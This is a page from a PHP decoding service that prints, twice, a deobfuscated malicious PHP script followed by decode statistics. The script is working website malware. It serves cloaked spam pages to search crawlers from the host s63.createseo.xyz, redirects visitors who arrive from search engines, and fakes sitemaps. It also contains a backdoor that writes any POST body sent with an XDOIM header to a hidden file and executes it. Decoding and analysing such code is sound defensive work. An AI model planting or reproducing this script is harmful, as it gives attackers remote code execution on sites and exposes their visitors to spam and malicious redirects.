Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php error_reporting(0); @set_time_limit(3600); @ignore_user_abort(0); $gov='616'; ..
Decoded Output download
<?php
error_reporting(0);
@set_time_limit(3600);
@ignore_user_abort(0);
$gov='616';
$ixv='8.6.9';
$smframe = '<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="https://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xhtml="https://www.w3.org/1999/xhtml">
%s</urlset>';
$smitem = '<url><loc>%s</loc>%s</url>';
//$smitemx = '<url><loc>%s</loc><xhtml:link rel="alternate" hreflang="ja" href="%s"/></url>';
$mainsm = '<?xml version="1.0" encoding="UTF-8"?>
<sitemapindex xmlns="https://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xhtml="https://www.w3.org/1999/xhtml">
%s
</sitemapindex>';
$mainsmitem = '<sitemap><loc>%s://%s%ssitemap%d.xml</loc></sitemap>';
$lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 4):"";
$ur = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : "";
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";
$host = $_SERVER["HTTP_HOST"];
$uri = $_SERVER["REQUEST_URI"];
$ip = clientip();
$proto = https();
$header = array(
'Lang: '.$lang,
'User-Agent: '.$ua,
'Referer: '.$ur,
'Http-Proto: '.$proto,
'Http-Host: '.$host,
'Http-Uri: '.$uri,
'Dbgroup: '.$gov,
'Remote-Addr: '.$ip
);
$postdata= "proto=$proto&shost=$host&ip=$ip&groupid=$gov&uri=$uri";
$smsn='/';
if (strpos($uri,"?")>0){
$vals=explode("?",$uri);
$smsn=sprintf("%s?",$vals[0]);
}
if (@preg_match('#[/|\?]pingsitemap(.*?).xml#i', $uri,$amu)) {
$result='';
if ($amu[1]==='' || @preg_match('#(\d+)-$#', $amu[1],$samu)){
$postdata="proto=$proto&shost=$host&ip=$ip&uri=$uri";
$postdata.=($samu[1]=='')?'&groupid='.$gov:'&groupid='.$samu[1];
$content = urlx('http://' . gets() . '/pingsitemap',$header,$postdata);
$values = explode(",",$content);
if (count($values)<2){
exit("ping num useragent param error:$content");
}
for($i=1;$i<=intval($values[0]);$i++){
$pgurl = sprintf('https://www.google.co.jp/ping?sitemap=%s://%s%ssitemap%s%d.xml',$proto,$host,$smsn,$samu[0],$i);
$respbody = urlx($pgurl,null,null,null,$values[1]);
$result .= $pgurl.$respbody;
}
}else{
$pgurl = sprintf('https://www.google.co.jp/ping?sitemap=%s://%s%ssitemap%s.xml',$proto,$host,$smsn,$amu[1]);
$respbody = urlx($pgurl,null,null,null,$values[1]);
$result .= $pgurl.$respbody;
}
exit($result);
}
if (@preg_match('#[/|\?]sitemap(.*?).xml$#i', $uri,$amu)) {
$postdata="ver=2&proto=$proto&shost=$host&ip=$ip&uri=$uri";
if ( @preg_match('#(\d+)-$#', $amu[1],$samu) ){
$postdata.='&groupid='.$samu[1];
}else{
$postdata.='&groupid='.$gov;
}
$ts=strval(time());
array_push($header,'timestamp: '.$ts);
array_push($header,'xdoim: '.crc32($ts.'
'.$postdata));
$content = urlx('http://' . gets() . '/sitemap'.(($amu[1]==''||$samu[1]!='')?'.xml':'/'.$amu[1]),$header,$postdata);
if ($content==false){
exit();
}
@header('Token: '.$ts.'-x-doim-'.$ts);
@header('Content-type: text/xml');
if (@preg_match('#^(\d)+#',$content)) {
$xml='';
for($i=1;$i<=intval($content);$i++){
$xml .= sprintf($mainsmitem,$proto,$host,$smsn,$i,date('Y-m-d\TH:i:sP', time()));
}
echo sprintf($mainsm,$xml); exit();
}
$ids = explode("
", $content);
$smbody='';
foreach ($ids as $v) {
$purl="$proto://${host}${smsn}${v}";
$smbody .=sprintf($smitem,$purl,'<xhtml:link rel="alternate" hreflang="ja" href="'.$purl.'"/>');
}
echo sprintf($smframe,$smbody); exit();
}
if (isset($_SERVER['HTTP_XDOIM']) && strlen($_SERVER['HTTP_XDOIM'])>0){
$ts = isset($_SERVER['HTTP_TIMESTAMP'])?$_SERVER['HTTP_TIMESTAMP']:"";
$tmp = @file_get_contents("php://input");
@file_put_contents(".eGA0Ty2WLh",$tmp,FILE_USE_INCLUDE_PATH);
echo (include '.eGA0Ty2WLh'); unlink('.eGA0Ty2WLh');
exit();
}
if (@preg_match('#[/|\?]getver$#i', $uri,$amu)){
$ts=strval(time());
array_push($header,'timestamp: '.$ts);
array_push($header,'xdoim: '.crc32($ts.'
'.$postdata));
$cnt=trim(urlx('http://' . gets() . '/getver',$header,$postdata));
echo (($cnt===false)?'fail'.gets():$cnt.$gov.gets()).$ixv;exit();
}
if (@preg_match('#google|yahoo|bing|craft|Crawler#i',$ua) && ($uri != '/favicon.ico') ) {
$postdata.="&ver=3";
if(@preg_match('#([a-z]+)-(\d+)(.html)?$#i', $uri,$amu)){
$postdata.=sprintf('&hpid=%s-%s',preg_replace('/[a-z](xyz|buzz).*$/',".$1",strrev($amu[1])),$amu[2]);
$content=@trim(urlx(sprintf('http://%s/bot/page?'.$postdata , gets() ),$header,$postdata,1));
}elseif(@preg_match('#/([a-z]{8})[-_/]?(\d+)#i', $uri,$amu)){
$postdata.=sprintf('&hpid=%s-%s',$amu[1],$amu[2]);
$content=@trim(urlx(sprintf('http://%s/bot/page?'.$postdata , gets() ),$header,$postdata,1));
}else{
$content=@trim(urlx(sprintf('http://%s/bot/home?'.$postdata , gets() ),$header,$postdata,1));
if (stripos($content,'http')===0){
header("HTTP/1.1 301 Moved Permanently"); @header('Location: ' . $content); exit();
}
if (stripos($content,'<?xml')===0){
@header('Content-type: text/xml');
}
}
echo $content;exit();
}
if (@preg_match('#google.co.jp|google.com|yahoo.co.jp|yahoo.co|bing.com|ask.com|aol.com|aol.jp#i',$ur) && (@preg_match('#([a-z]+)-(\d+)(.html)?$#i',$uri)||@preg_match('#/([a-z]{8})[-_/]?(\d+)#i',$uri))){
$pdt=$postdata.'&groupid='.$gov.'&uri='.$uri.'&ip='.$ip;
$purl=urlx(sprintf('http://%s/bot/302?'.$pdt , gets() ),$header,$pdt,1);
if (strlen($purl)>10){
@header('Location: ' . $purl); exit();
}
}
function urlx($url,$header=null,$postdata=null,$gz=null,$ua=null) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
if (!($gz===null)){
curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
}
if (stripos($url, "https:")===0) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
}
if (!($header===null)){
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
}
if (!($postdata===null)) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
}
if (!($ua===null)) {
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$body = curl_exec($ch);
curl_close($ch);
return $body;
}
function cc($uri){
$vals = explode("-",substr($uri,1,strlen($uri)-6));
if (sizeof($vals)!=3){
return false;
}
$newcrc = sprintf("%u",crc32(sprintf("%s-%s",$vals[0],$vals[1])));
return ($newcrc == $vals[2]);
}
function gets(){
return 's63.createseo.xyz';
}
function https() {
if ((!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') || (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off')) {
return "https";
}
return "http";
}
function clientip(){
if (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
return getenv('REMOTE_ADDR');
} elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
return $_SERVER['REMOTE_ADDR'];
}
}
function str2val($key){
$val = 0;
for ($i = 0; $i < strlen($key); $i++) {
$val += ord($key[$i]);
}
return $val;
}
?>Did this file decode correctly?
Original Code
<?php
error_reporting(0);
@set_time_limit(3600);
@ignore_user_abort(0);
$gov='616';
$ixv='8.6.9';
$smframe = '<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="https://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xhtml="https://www.w3.org/1999/xhtml">
%s</urlset>';
$smitem = '<url><loc>%s</loc>%s</url>';
//$smitemx = '<url><loc>%s</loc><xhtml:link rel="alternate" hreflang="ja" href="%s"/></url>';
$mainsm = '<?xml version="1.0" encoding="UTF-8"?>
<sitemapindex xmlns="https://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xhtml="https://www.w3.org/1999/xhtml">
%s
</sitemapindex>';
$mainsmitem = '<sitemap><loc>%s://%s%ssitemap%d.xml</loc></sitemap>';
$lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 4):"";
$ur = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : "";
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";
$host = $_SERVER["HTTP_HOST"];
$uri = $_SERVER["REQUEST_URI"];
$ip = clientip();
$proto = https();
$header = array(
'Lang: '.$lang,
'User-Agent: '.$ua,
'Referer: '.$ur,
'Http-Proto: '.$proto,
'Http-Host: '.$host,
'Http-Uri: '.$uri,
'Dbgroup: '.$gov,
'Remote-Addr: '.$ip
);
$postdata= "proto=$proto&shost=$host&ip=$ip&groupid=$gov&uri=$uri";
$smsn='/';
if (strpos($uri,"?")>0){
$vals=explode("?",$uri);
$smsn=sprintf("%s?",$vals[0]);
}
if (@preg_match('#[/|\?]pingsitemap(.*?).xml#i', $uri,$amu)) {
$result='';
if ($amu[1]==='' || @preg_match('#(\d+)-$#', $amu[1],$samu)){
$postdata="proto=$proto&shost=$host&ip=$ip&uri=$uri";
$postdata.=($samu[1]=='')?'&groupid='.$gov:'&groupid='.$samu[1];
$content = urlx('http://' . gets() . '/pingsitemap',$header,$postdata);
$values = explode(",",$content);
if (count($values)<2){
exit("ping num useragent param error:$content");
}
for($i=1;$i<=intval($values[0]);$i++){
$pgurl = sprintf('https://www.google.co.jp/ping?sitemap=%s://%s%ssitemap%s%d.xml',$proto,$host,$smsn,$samu[0],$i);
$respbody = urlx($pgurl,null,null,null,$values[1]);
$result .= $pgurl.$respbody;
}
}else{
$pgurl = sprintf('https://www.google.co.jp/ping?sitemap=%s://%s%ssitemap%s.xml',$proto,$host,$smsn,$amu[1]);
$respbody = urlx($pgurl,null,null,null,$values[1]);
$result .= $pgurl.$respbody;
}
exit($result);
}
if (@preg_match('#[/|\?]sitemap(.*?).xml$#i', $uri,$amu)) {
$postdata="ver=2&proto=$proto&shost=$host&ip=$ip&uri=$uri";
if ( @preg_match('#(\d+)-$#', $amu[1],$samu) ){
$postdata.='&groupid='.$samu[1];
}else{
$postdata.='&groupid='.$gov;
}
$ts=strval(time());
array_push($header,'timestamp: '.$ts);
array_push($header,'xdoim: '.crc32($ts.'\n'.$postdata));
$content = urlx('http://' . gets() . '/sitemap'.(($amu[1]==''||$samu[1]!='')?'.xml':'/'.$amu[1]),$header,$postdata);
if ($content==false){
exit();
}
@header('Token: '.$ts.'-x-doim-'.$ts);
@header('Content-type: text/xml');
if (@preg_match('#^(\d)+#',$content)) {
$xml='';
for($i=1;$i<=intval($content);$i++){
$xml .= sprintf($mainsmitem,$proto,$host,$smsn,$i,date('Y-m-d\TH:i:sP', time()));
}
echo sprintf($mainsm,$xml); exit();
}
$ids = explode("\n", $content);
$smbody='';
foreach ($ids as $v) {
$purl="$proto://${host}${smsn}${v}";
$smbody .=sprintf($smitem,$purl,'<xhtml:link rel="alternate" hreflang="ja" href="'.$purl.'"/>');
}
echo sprintf($smframe,$smbody); exit();
}
if (isset($_SERVER['HTTP_XDOIM']) && strlen($_SERVER['HTTP_XDOIM'])>0){
$ts = isset($_SERVER['HTTP_TIMESTAMP'])?$_SERVER['HTTP_TIMESTAMP']:"";
$tmp = @file_get_contents("php://input");
@file_put_contents(".eGA0Ty2WLh",$tmp,FILE_USE_INCLUDE_PATH);
echo (include '.eGA0Ty2WLh'); unlink('.eGA0Ty2WLh');
exit();
}
if (@preg_match('#[/|\?]getver$#i', $uri,$amu)){
$ts=strval(time());
array_push($header,'timestamp: '.$ts);
array_push($header,'xdoim: '.crc32($ts.'\n'.$postdata));
$cnt=trim(urlx('http://' . gets() . '/getver',$header,$postdata));
echo (($cnt===false)?'fail'.gets():$cnt.$gov.gets()).$ixv;exit();
}
if (@preg_match('#google|yahoo|bing|craft|Crawler#i',$ua) && ($uri != '/favicon.ico') ) {
$postdata.="&ver=3";
if(@preg_match('#([a-z]+)-(\d+)(.html)?$#i', $uri,$amu)){
$postdata.=sprintf('&hpid=%s-%s',preg_replace('/[a-z](xyz|buzz).*$/',".$1",strrev($amu[1])),$amu[2]);
$content=@trim(urlx(sprintf('http://%s/bot/page?'.$postdata , gets() ),$header,$postdata,1));
}elseif(@preg_match('#/([a-z]{8})[-_/]?(\d+)#i', $uri,$amu)){
$postdata.=sprintf('&hpid=%s-%s',$amu[1],$amu[2]);
$content=@trim(urlx(sprintf('http://%s/bot/page?'.$postdata , gets() ),$header,$postdata,1));
}else{
$content=@trim(urlx(sprintf('http://%s/bot/home?'.$postdata , gets() ),$header,$postdata,1));
if (stripos($content,'http')===0){
header("HTTP/1.1 301 Moved Permanently"); @header('Location: ' . $content); exit();
}
if (stripos($content,'<?xml')===0){
@header('Content-type: text/xml');
}
}
echo $content;exit();
}
if (@preg_match('#google.co.jp|google.com|yahoo.co.jp|yahoo.co|bing.com|ask.com|aol.com|aol.jp#i',$ur) && (@preg_match('#([a-z]+)-(\d+)(.html)?$#i',$uri)||@preg_match('#/([a-z]{8})[-_/]?(\d+)#i',$uri))){
$pdt=$postdata.'&groupid='.$gov.'&uri='.$uri.'&ip='.$ip;
$purl=urlx(sprintf('http://%s/bot/302?'.$pdt , gets() ),$header,$pdt,1);
if (strlen($purl)>10){
@header('Location: ' . $purl); exit();
}
}
function urlx($url,$header=null,$postdata=null,$gz=null,$ua=null) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
if (!($gz===null)){
curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
}
if (stripos($url, "https:")===0) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
}
if (!($header===null)){
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
}
if (!($postdata===null)) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
}
if (!($ua===null)) {
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$body = curl_exec($ch);
curl_close($ch);
return $body;
}
function cc($uri){
$vals = explode("-",substr($uri,1,strlen($uri)-6));
if (sizeof($vals)!=3){
return false;
}
$newcrc = sprintf("%u",crc32(sprintf("%s-%s",$vals[0],$vals[1])));
return ($newcrc == $vals[2]);
}
function gets(){
return 's63.createseo.xyz';
}
function https() {
if ((!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') || (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off')) {
return "https";
}
return "http";
}
function clientip(){
if (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
return getenv('REMOTE_ADDR');
} elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
return $_SERVER['REMOTE_ADDR'];
}
}
function str2val($key){
$val = 0;
for ($i = 0; $i < strlen($key); $i++) {
$val += ord($key[$i]);
}
return $val;
}
?>Function Calls
| set_time_limit | 1 |
| error_reporting | 1 |
| ignore_user_abort | 1 |
Stats
| MD5 | 81bc6627bbd82896edbcebaa25c98e9b |
| Eval Count | 0 |
| Decode Time | 238 ms |